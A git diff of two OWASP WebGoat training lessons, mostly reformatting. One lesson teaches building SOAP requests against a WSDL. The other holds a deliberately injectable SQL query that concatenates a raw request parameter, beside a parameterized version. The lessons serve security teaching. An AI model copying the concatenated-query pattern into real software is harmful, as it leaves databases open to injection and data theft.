- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
+ *
 * @author asmolen
- *
- * TODO To change the template for this generated type comment go to
- * Window - Preferences - Java - Code Style - Code Templates
+ *
+ * TODO To change the template for this generated type comment go to Window - Preferences - Java -
+ * Code Style - Code Templates
 */
 public class SoapRequest extends SequentialLessonAdapter
 {
- public final static String firstName = "getFirstName";
+ public final static String firstName = "getFirstName";
- public final static String lastName = "getLastName";
+ public final static String lastName = "getLastName";
- public final static String loginCount = "getLoginCount";
+ public final static String loginCount = "getLoginCount";
- public final static String ccNumber = "getCreditCard";
+ public final static String ccNumber = "getCreditCard";
- //int instead of boolean to keep track of method invocation count
- static int accessFirstName;
+ // int instead of boolean to keep track of method invocation count
+ static int accessFirstName;
- static int accessLastName;
+ static int accessLastName;
- static int accessCreditCard;
+ static int accessCreditCard;
- static int accessLoginCount;
+ static int accessLoginCount;
 private static WebgoatContext webgoatContext;
-
+
 /**
- * We maintain a static reference to WebgoatContext, since this class
- * is also automatically instantiated by the Axis web services module,
- * which does not call setWebgoatContext()
+ * We maintain a static reference to WebgoatContext, since this class is also automatically
+ * instantiated by the Axis web services module, which does not call setWebgoatContext()
 * (non-Javadoc)
+ *
 * @see org.owasp.webgoat.lessons.AbstractLesson#setWebgoatContext(org.owasp.webgoat.session.WebgoatContext)
 */
 @Override
- public void setWebgoatContext(WebgoatContext webgoatContext) {
+ public void setWebgoatContext(WebgoatContext webgoatContext)
+ {
 SoapRequest.webgoatContext = webgoatContext;
 }
-
+
 @Override
- public WebgoatContext getWebgoatContext() {
+ public WebgoatContext getWebgoatContext()
+ {
 return SoapRequest.webgoatContext;
 }
- protected Category getDefaultCategory()
- {
- return Category.WEB_SERVICES;
- }
-
-
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints
- .add("Accessible operations are delimited by the <operation> tag contained within the <portType> section of the WSDL.
Below is an example of a typical operation (getFirstName):

" - + "<wsdl:portType name=\"SoapRequest\">
" - + "<wsdl:operation name=\"getFirstName\">
" - + "<wsdl:input message=\"impl:getFirstNameRequest\" name=\"getFirstNameRequest\" />
" - + "<wsdl:output message=\"impl:getFirstNameResponse\" name=\"getFirstNameResponse\" />
" - + "<wsdlsoap:operation soapAction=\"\" />" - + "</wsdl:portType>

" - + "The methods invoked are defined by the input and output message attributes. " - + "Example: \"getFirstNameRequest\""); - hints - .add("There are several tags within a SOAP envelope. " - + "Each namespace is defined in the <definitions> section of the WSDL, and is declared using the (xmlns:namespace_name_here=\"namespace_reference_location_here\") format.

" - + "The following example defines a tag \"<xsd:\", whose attribute structure will reference the namespace location assigned to it in the declaration:
" - + "xmlns:xsd=\"http://www.w3.org/2001/XMLSchema"); - hints - .add("Determine what parameters and types are required by the message definition corresponding to the operation's request method. " - + "This example defines a parameter (id) of type (int) in the namespace (xsd) for the method (getFirstNameRequest):
" - + "<wsdl:message name=\"getFirstNameRequest\"

" - + "<wsdl:part name=\"id\" type=\"xsd:int\" />
" - + "</wsdl:message>

" - + "Examples of other types:
" - + "{boolean, byte, base64Binary, double, float, int, long, short, unsignedInt, unsignedLong, unsignedShort, string}.
"); - String soapEnv = "A SOAP request uses the following HTTP header:

" - + "SOAPAction: some action header, can be ""

" - + "The SOAP message body has the following format:
" - + "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
" - + "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"
" - + " xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
" - + " xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">
" - + "  <SOAP-ENV:Body>
" - + "    <ns1:getFirstName SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:ns1=\"http://lessons\">
" - + "    <id xsi:type=\"xsd:int\">101</id>
" - + "    </ns1:getFirstName>
" - + "  </SOAP-ENV:Body>
" - + "</SOAP-ENV:Envelope>

" - + "Intercept the HTTP request and try to create a SOAP request."; - soapEnv.replaceAll("(?s) ", " "); - hints.add(soapEnv); - - return hints; - } - - private final static Integer DEFAULT_RANKING = new Integer(100); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - public String getTitle() - { - return "Create a SOAP Request"; - } - - - protected Element makeOperationsLine(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - Table t1 = new Table().setCellSpacing(0).setCellPadding(2); - - if (s.isColor()) + protected Category getDefaultCategory() { - t1.setBorder(1); + return Category.WEB_SERVICES; } - TR tr = new TR(); - tr.addElement(new TD() - .addElement("How many operations are defined in the WSDL: ")); - tr.addElement(new TD(new Input(Input.TEXT, "count", ""))); - Element b = ECSFactory.makeButton("Submit"); - tr.addElement(new TD(b).setAlign("LEFT")); - t1.addElement(tr); - - ec.addElement(t1); - - return ec; - } - - - protected Element makeTypeLine(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - Table t1 = new Table().setCellSpacing(0).setCellPadding(2); - - if (s.isColor()) + protected List getHints(WebSession s) { - t1.setBorder(1); + List hints = new ArrayList(); + hints + .add("Accessible operations are delimited by the <operation> tag contained within the <portType> section of the WSDL.
Below is an example of a typical operation (getFirstName):

" + + "<wsdl:portType name=\"SoapRequest\">
" + + "<wsdl:operation name=\"getFirstName\">
" + + "<wsdl:input message=\"impl:getFirstNameRequest\" name=\"getFirstNameRequest\" />
" + + "<wsdl:output message=\"impl:getFirstNameResponse\" name=\"getFirstNameResponse\" />
" + + "<wsdlsoap:operation soapAction=\"\" />" + + "</wsdl:portType>

" + + "The methods invoked are defined by the input and output message attributes. " + + "Example: \"getFirstNameRequest\""); + hints + .add("There are several tags within a SOAP envelope. " + + "Each namespace is defined in the <definitions> section of the WSDL, and is declared using the (xmlns:namespace_name_here=\"namespace_reference_location_here\") format.

" + + "The following example defines a tag \"<xsd:\", whose attribute structure will reference the namespace location assigned to it in the declaration:
" + + "xmlns:xsd=\"http://www.w3.org/2001/XMLSchema"); + hints + .add("Determine what parameters and types are required by the message definition corresponding to the operation's request method. " + + "This example defines a parameter (id) of type (int) in the namespace (xsd) for the method (getFirstNameRequest):
" + + "<wsdl:message name=\"getFirstNameRequest\"

" + + "<wsdl:part name=\"id\" type=\"xsd:int\" />
" + + "</wsdl:message>

" + + "Examples of other types:
" + + "{boolean, byte, base64Binary, double, float, int, long, short, unsignedInt, unsignedLong, unsignedShort, string}.
"); + String soapEnv = "A SOAP request uses the following HTTP header:

" + + "SOAPAction: some action header, can be ""

" + + "The SOAP message body has the following format:
" + + "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
" + + "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"
" + + " xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
" + + " xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">
" + + "  <SOAP-ENV:Body>
" + + "    <ns1:getFirstName SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:ns1=\"http://lessons\">
" + + "    <id xsi:type=\"xsd:int\">101</id>
" + + "    </ns1:getFirstName>
" + "  </SOAP-ENV:Body>
" + + "</SOAP-ENV:Envelope>

" + + "Intercept the HTTP request and try to create a SOAP request."; + soapEnv.replaceAll("(?s) ", " "); + hints.add(soapEnv); + + return hints; } - TR tr = new TR(); - tr - .addElement(new TD() - .addElement("Now, what is the type of the (id) parameter in the \"getFirstNameRequest\" method: ")); - tr.addElement(new TD(new Input(Input.TEXT, "type", ""))); - Element b = ECSFactory.makeButton("Submit"); - tr.addElement(new TD(b).setAlign("LEFT")); - t1.addElement(tr); + private final static Integer DEFAULT_RANKING = new Integer(100); - ec.addElement(t1); - - return ec; - } - - - protected Element createContent(WebSession s) - { - return super.createStagedContent(s); - } - - - protected Element doStage1(WebSession s) throws Exception - { - return viewWsdl(s); - } - - - protected Element doStage2(WebSession s) throws Exception - { - return determineType(s); - } - - - protected Element doStage3(WebSession s) throws Exception - { - return createSoapEnvelope(s); - } - - - protected Element viewWsdl(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - //DEVNOTE: Test for stage completion. - try + protected Integer getDefaultRanking() { - int operationCount = 0; - operationCount = s.getParser().getIntParameter("count"); - - if (operationCount == 4) - { - getLessonTracker(s).setStage(2); - s.setMessage("Stage 1 completed."); - - // Redirect user to Stage2 content. - ec.addElement(doStage2(s)); - } - else - { - s.setMessage("Sorry, that is an incorrect count. Try Again."); - } - } - catch (NumberFormatException nfe) - { - //DEVNOTE: Eat the exception. - //ec.addElement( new P().addElement( nfe.getMessage() ) ); - s.setMessage("Sorry, that answer is invalid. Try again."); - } - catch (ParameterNotFoundException pnfe) - { - //DEVNOTE: Eat the exception. 
- // ec.addElement( new P().addElement( pnfe.getMessage() ) );
- }
- catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
+ return DEFAULT_RANKING;
 }
- //DEVNOTE: Conditionally display Stage1 content depending on whether stage is completed or not
- if (getLessonTracker(s).getStage() == 1)
- //if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) ||
- // (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("1") )
+ public String getTitle()
 {
- ec.addElement(makeOperationsLine(s));
-
- A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
- ec
- .addElement(new P()
- .addElement("View the following WSDL and count available operations:"));
- ec.addElement(new BR());
- ec.addElement(a);
+ return "Create a SOAP Request";
 }
- //getLessonTracker( s ).setCompleted( SoapRequest.completed );
-
- return (ec);
- }
-
-
- protected Element determineType(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- //DEVNOTE: Test for stage completion.
- try
+ protected Element makeOperationsLine(WebSession s)
 {
- String paramType = "";
- paramType = s.getParser().getStringParameter("type");
+ ElementContainer ec = new ElementContainer();
- //if (paramType.equalsIgnoreCase("int"))
- if (paramType.equals("int"))
- {
- getLessonTracker(s).setStage(3);
- s.setMessage("Stage 2 completed. ");
- //s.setMessage("Now, you'll craft a SOAP envelope for invoking a web service directly.");
+ Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
- // Redirect user to Stage2 content.
- ec.addElement(doStage3(s));
- }
- else
- {
- s.setMessage("Sorry, that is an incorrect type. Try Again.");
- }
- }
- catch (ParameterNotFoundException pnfe)
- {
- //DEVNOTE: Eat the exception.
- // ec.addElement( new P().addElement( pnfe.getMessage() ) ); - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - - //DEVNOTE: Conditionally display Stage2 content depending on whether stage is completed or not - if (getLessonTracker(s).getStage() == 2) - //if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) || - // (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("2") ) - { - ec.addElement(makeTypeLine(s)); - - A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File"); - ec - .addElement(new P() - .addElement("View the following WSDL and count available operations:")); - ec.addElement(new BR()); - ec.addElement(a); - } - - //getLessonTracker( s ).setCompleted( SoapRequest.completed ); - - return (ec); - } - - - protected Element createSoapEnvelope(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - // Determine how many methods have been accessed. User needs to check at least two methods - // before completing the lesson. - if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) >= 2) - { - /** Reset function access counters **/ - accessFirstName = accessLastName = accessCreditCard = accessLoginCount = 0; - //SoapRequest.completed = true; - makeSuccess(s); - } - else - { - - // display Stage2 content - ec - .addElement(new P() - .addElement("Intercept the request and invoke any method by sending a valid SOAP request for a valid account.
")); - Element b = ECSFactory - .makeButton("Press to generate an HTTP request"); - ec.addElement(b); - - // conditionally display invoked methods - if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) > 0) - { - ec.addElement("

Methods Invoked:
"); - ec.addElement("
    "); - if (accessFirstName > 0) + if (s.isColor()) { - ec.addElement("
  • getFirstName
  • "); + t1.setBorder(1); } - if (accessLastName > 0) - { - ec.addElement("
  • getLastName
  • "); - } - if (accessCreditCard > 0) - { - ec.addElement("
  • getCreditCard
  • "); - } - if (accessLoginCount > 0) - { - ec.addElement("
  • getLoginCount
  • "); - } - ec.addElement("
"); - } - A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File"); - ec.addElement(new BR()); - ec.addElement(a); -} - - //getLessonTracker( s ).setCompleted( SoapRequest.completed ); - return (ec); - } - - - public String getResults(int id, String field) - { - try - { - Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext()); - PreparedStatement ps = connection - .prepareStatement("SELECT * FROM user_data WHERE userid = ?"); - ps.setInt(1, id); - try - { - ResultSet results = ps.executeQuery(); - if ((results != null) && (results.next() == true)) - { - return results.getString(field); - } - } - catch (SQLException sqle) - {} - } - catch (Exception e) - {} - return null; - } - - - public String getCreditCard(int id) - { - String result = getResults(id, "cc_number"); - //SoapRequest.completed = true; - - if (result != null) - { - //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed. - // This is intended to be used to determine how many methods have been accessed, not how often. - accessCreditCard = 1; - return result; - } - return null; - } - - - public String getFirstName(int id) - { - String result = getResults(id, "first_name"); - if (result != null) - { - //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed. - // This is intended to be used to determine how many methods have been accessed, not how often. - accessFirstName = 1; - return result; - } - return null; - } - - - public String getLastName(int id) - { - String result = getResults(id, "last_name"); - if (result != null) - { - //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed. - // This is intended to be used to determine how many methods have been accessed, not how often. 
- accessLastName = 1; - return result; - } - return null; - } - - - public String getLoginCount(int id) - { - String result = getResults(id, "login_count"); - if (result != null) - { - //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed. - // This is intended to be used to determine how many methods have been accessed, not how often. - accessLoginCount = 1; - return result; - } - return null; - } + TR tr = new TR(); + tr.addElement(new TD().addElement("How many operations are defined in the WSDL: ")); + tr.addElement(new TD(new Input(Input.TEXT, "count", ""))); + Element b = ECSFactory.makeButton("Submit"); + tr.addElement(new TD(b).setAlign("LEFT")); + t1.addElement(tr); + + ec.addElement(t1); + + return ec; + } + + protected Element makeTypeLine(WebSession s) + { + ElementContainer ec = new ElementContainer(); + + Table t1 = new Table().setCellSpacing(0).setCellPadding(2); + + if (s.isColor()) + { + t1.setBorder(1); + } + + TR tr = new TR(); + tr.addElement(new TD() + .addElement("Now, what is the type of the (id) parameter in the \"getFirstNameRequest\" method: ")); + tr.addElement(new TD(new Input(Input.TEXT, "type", ""))); + Element b = ECSFactory.makeButton("Submit"); + tr.addElement(new TD(b).setAlign("LEFT")); + t1.addElement(tr); + + ec.addElement(t1); + + return ec; + } + + protected Element createContent(WebSession s) + { + return super.createStagedContent(s); + } + + protected Element doStage1(WebSession s) throws Exception + { + return viewWsdl(s); + } + + protected Element doStage2(WebSession s) throws Exception + { + return determineType(s); + } + + protected Element doStage3(WebSession s) throws Exception + { + return createSoapEnvelope(s); + } + + protected Element viewWsdl(WebSession s) + { + ElementContainer ec = new ElementContainer(); + + // DEVNOTE: Test for stage completion. 
+ try + { + int operationCount = 0; + operationCount = s.getParser().getIntParameter("count"); + + if (operationCount == 4) + { + getLessonTracker(s).setStage(2); + s.setMessage("Stage 1 completed."); + + // Redirect user to Stage2 content. + ec.addElement(doStage2(s)); + } + else + { + s.setMessage("Sorry, that is an incorrect count. Try Again."); + } + } catch (NumberFormatException nfe) + { + // DEVNOTE: Eat the exception. + // ec.addElement( new P().addElement( nfe.getMessage() ) ); + s.setMessage("Sorry, that answer is invalid. Try again."); + } catch (ParameterNotFoundException pnfe) + { + // DEVNOTE: Eat the exception. + // ec.addElement( new P().addElement( pnfe.getMessage() ) ); + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + // DEVNOTE: Conditionally display Stage1 content depending on whether stage is completed or + // not + if (getLessonTracker(s).getStage() == 1) + // if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) || + // (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("1") ) + { + ec.addElement(makeOperationsLine(s)); + + A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File"); + ec.addElement(new P().addElement("View the following WSDL and count available operations:")); + ec.addElement(new BR()); + ec.addElement(a); + } + + // getLessonTracker( s ).setCompleted( SoapRequest.completed ); + + return (ec); + } + + protected Element determineType(WebSession s) + { + ElementContainer ec = new ElementContainer(); + + // DEVNOTE: Test for stage completion. + try + { + String paramType = ""; + paramType = s.getParser().getStringParameter("type"); + + // if (paramType.equalsIgnoreCase("int")) + if (paramType.equals("int")) + { + getLessonTracker(s).setStage(3); + s.setMessage("Stage 2 completed. 
"); + // s.setMessage("Now, you'll craft a SOAP envelope for invoking a web service + // directly."); + + // Redirect user to Stage2 content. + ec.addElement(doStage3(s)); + } + else + { + s.setMessage("Sorry, that is an incorrect type. Try Again."); + } + } catch (ParameterNotFoundException pnfe) + { + // DEVNOTE: Eat the exception. + // ec.addElement( new P().addElement( pnfe.getMessage() ) ); + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + // DEVNOTE: Conditionally display Stage2 content depending on whether stage is completed or + // not + if (getLessonTracker(s).getStage() == 2) + // if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) || + // (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("2") ) + { + ec.addElement(makeTypeLine(s)); + + A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File"); + ec.addElement(new P().addElement("View the following WSDL and count available operations:")); + ec.addElement(new BR()); + ec.addElement(a); + } + + // getLessonTracker( s ).setCompleted( SoapRequest.completed ); + + return (ec); + } + + protected Element createSoapEnvelope(WebSession s) + { + ElementContainer ec = new ElementContainer(); + + // Determine how many methods have been accessed. User needs to check at least two methods + // before completing the lesson. + if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) >= 2) + { + /** Reset function access counters * */ + accessFirstName = accessLastName = accessCreditCard = accessLoginCount = 0; + // SoapRequest.completed = true; + makeSuccess(s); + } + else + { + + // display Stage2 content + ec + .addElement(new P() + .addElement("Intercept the request and invoke any method by sending a valid SOAP request for a valid account.
")); + Element b = ECSFactory.makeButton("Press to generate an HTTP request"); + ec.addElement(b); + + // conditionally display invoked methods + if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) > 0) + { + ec.addElement("

Methods Invoked:
"); + ec.addElement("
    "); + if (accessFirstName > 0) + { + ec.addElement("
  • getFirstName
  • "); + } + if (accessLastName > 0) + { + ec.addElement("
  • getLastName
  • "); + } + if (accessCreditCard > 0) + { + ec.addElement("
  • getCreditCard
  • "); + } + if (accessLoginCount > 0) + { + ec.addElement("
  • getLoginCount
  • "); + } + ec.addElement("
"); + } + + A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File"); + ec.addElement(new BR()); + ec.addElement(a); + } + + // getLessonTracker( s ).setCompleted( SoapRequest.completed ); + return (ec); + } + + public String getResults(int id, String field) + { + try + { + Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext()); + PreparedStatement ps = connection.prepareStatement("SELECT * FROM user_data WHERE userid = ?"); + ps.setInt(1, id); + try + { + ResultSet results = ps.executeQuery(); + if ((results != null) && (results.next() == true)) { return results.getString(field); } + } catch (SQLException sqle) + { + } + } catch (Exception e) + { + } + return null; + } + + public String getCreditCard(int id) + { + String result = getResults(id, "cc_number"); + // SoapRequest.completed = true; + + if (result != null) + { + // DEVNOTE: Always set method access counter to (1) no matter how many times it is + // accessed. + // This is intended to be used to determine how many methods have been accessed, not how + // often. + accessCreditCard = 1; + return result; + } + return null; + } + + public String getFirstName(int id) + { + String result = getResults(id, "first_name"); + if (result != null) + { + // DEVNOTE: Always set method access counter to (1) no matter how many times it is + // accessed. + // This is intended to be used to determine how many methods have been accessed, not how + // often. + accessFirstName = 1; + return result; + } + return null; + } + + public String getLastName(int id) + { + String result = getResults(id, "last_name"); + if (result != null) + { + // DEVNOTE: Always set method access counter to (1) no matter how many times it is + // accessed. + // This is intended to be used to determine how many methods have been accessed, not how + // often. 
+ accessLastName = 1; + return result; + } + return null; + } + + public String getLoginCount(int id) + { + String result = getResults(id, "login_count"); + if (result != null) + { + // DEVNOTE: Always set method access counter to (1) no matter how many times it is + // accessed. + // This is intended to be used to determine how many methods have been accessed, not how + // often. + accessLoginCount = 1; + return result; + } + return null; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java index d4d7de0f8..07ef38ac3 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.sql.Connection; @@ -11,7 +12,6 @@ import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.TreeMap; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.BR; 
@@ -23,366 +23,329 @@ import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created October 28, 2003
 */
 public class SqlNumericInjection extends SequentialLessonAdapter
 {
- private final static String STATION_ID = "station";
+ private final static String STATION_ID = "station";
- private String station;
+ private String station;
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
-
- protected Element createContent(WebSession s)
- {
- return super.createStagedContent(s);
- }
-
-
- protected Element doStage1(WebSession s) throws Exception
- {
- return injectableQuery(s);
- }
-
-
- protected Element doStage2(WebSession s) throws Exception
- {
- return parameterizedQuery(s);
- }
-
-
- protected Element injectableQuery(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
+ protected Element createContent(WebSession s)
 {
+ return super.createStagedContent(s);
+ }
- ec.addElement(makeStationList(s));
+ protected Element doStage1(WebSession s) throws Exception
+ {
+ return injectableQuery(s);
+ }
- String query;
+ protected Element doStage2(WebSession s) throws Exception
+ {
+ return parameterizedQuery(s);
+ }
- station = s.getParser().getRawParameter(STATION_ID, null);
+ protected 
Element injectableQuery(WebSession s) + { + ElementContainer ec = new ElementContainer(); - if (station == null) - { - query = "SELECT * FROM weather_data WHERE station = [station]"; - } - else - { - query = "SELECT * FROM weather_data WHERE station = " + station; - } + try + { - ec.addElement(new PRE(query)); + ec.addElement(makeStationList(s)); + + String query; + + station = s.getParser().getRawParameter(STATION_ID, null); + + if (station == null) + { + query = "SELECT * FROM weather_data WHERE station = [station]"; + } + else + { + query = "SELECT * FROM weather_data WHERE station = " + station; + } + + ec.addElement(new PRE(query)); + + if (station == null) return ec; + + Connection connection = DatabaseUtilities.getConnection(s); + + try + { + Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery(query); + + if ((results != null) && (results.first() == true)) + { + ResultSetMetaData resultsMetaData = results.getMetaData(); + ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData)); + results.last(); + + // If they get back more than one row they succeeded + if (results.getRow() > 1) + { + makeSuccess(s); + getLessonTracker(s).setStage(2); + s.setMessage("Start this lesson over to attack a parameterized query."); + } + } + else + { + ec.addElement("No results matched. 
Try Again."); + } + + } catch (SQLException sqle) + { + ec.addElement(new P().addElement(sqle.getMessage())); + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + return (ec); + } + + protected Element parameterizedQuery(WebSession s) + { + ElementContainer ec = new ElementContainer(); + + ec.addElement("Now that you have successfully performed an SQL injection, try the same " + + " type of attack on a parameterized query."); + // if ( s.getParser().getRawParameter( ACCT_NUM, "101" ).equals("restart")) + // { + // getLessonTracker(s).setStage(1); + // return( injectableQuery(s)); + // } + + ec.addElement(new BR()); + + try + { + Connection connection = DatabaseUtilities.getConnection(s); + + ec.addElement(makeStationList(s)); + + String query = "SELECT * FROM weather_data WHERE station = ?"; + + station = s.getParser().getRawParameter(STATION_ID, null); + + ec.addElement(new PRE(query)); + + if (station == null) return ec; + + try + { + PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + statement.setInt(1, Integer.parseInt(station)); + ResultSet results = statement.executeQuery(); + + if ((results != null) && (results.first() == true)) + { + ResultSetMetaData resultsMetaData = results.getMetaData(); + ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData)); + results.last(); + + // If they get back more than one row they succeeded + if (results.getRow() > 1) + { + makeSuccess(s); + } + } + else + { + ec.addElement("No results matched. 
Try Again."); + } + } catch (SQLException sqle) + { + ec.addElement(new P().addElement(sqle.getMessage())); + } catch (NumberFormatException npe) + { + ec.addElement(new P().addElement("Error parsing station as a number: " + npe.getMessage())); + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + return (ec); + } + + protected Element makeStationList(WebSession s) throws SQLException, ClassNotFoundException + { + ElementContainer ec = new ElementContainer(); + + ec.addElement(new P().addElement("Select your local weather station: ")); + + Map stations = getStations(s); + Select select = new Select(STATION_ID); + Iterator it = stations.keySet().iterator(); + while (it.hasNext()) + { + String key = (String) it.next(); + select.addElement(new Option(key).addElement((String) stations.get(key))); + } + ec.addElement(select); + ec.addElement(new P()); + + Element b = ECSFactory.makeButton("Go!"); + ec.addElement(b); - if (station == null) return ec; + } + + /** + * Gets the stations from the db + * + * @return A map containing each station, indexed by station number + */ + protected Map getStations(WebSession s) throws SQLException, ClassNotFoundException + { Connection connection = DatabaseUtilities.getConnection(s); - try - { - Statement statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery(query); + Map stations = new TreeMap(); + String query = "SELECT DISTINCT station, name FROM WEATHER_DATA"; - if ((results != null) && (results.first() == true)) + try { - ResultSetMetaData resultsMetaData = results.getMetaData(); - ec.addElement(DatabaseUtilities.writeTable(results, - resultsMetaData)); - results.last(); + Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery(query); - // If they get back 
more than one row they succeeded - if (results.getRow() > 1) - { - makeSuccess(s); - getLessonTracker(s).setStage(2); - s - .setMessage("Start this lesson over to attack a parameterized query."); - } - } - else + if ((results != null) && (results.first() == true)) + { + results.beforeFirst(); + + while (results.next()) + { + String station = results.getString("station"); + String name = results.getString("name"); + + // + if (!station.equals("10001") && !station.equals("11001")) + { + stations.put(station, name); + } + // + } + + results.close(); + } + } catch (SQLException sqle) { - ec.addElement("No results matched. Try Again."); + sqle.printStackTrace(); } - } - catch (SQLException sqle) - { - ec.addElement(new P().addElement(sqle.getMessage())); - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return stations; } - return (ec); - } - - - protected Element parameterizedQuery(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - ec - .addElement("Now that you have successfully performed an SQL injection, try the same " - + " type of attack on a parameterized query."); - // if ( s.getParser().getRawParameter( ACCT_NUM, "101" ).equals("restart")) - // { - // getLessonTracker(s).setStage(1); - // return( injectableQuery(s)); - // } - - ec.addElement(new BR()); - - try + /** + * Gets the category attribute of the SqNumericInjection object + * + * @return The 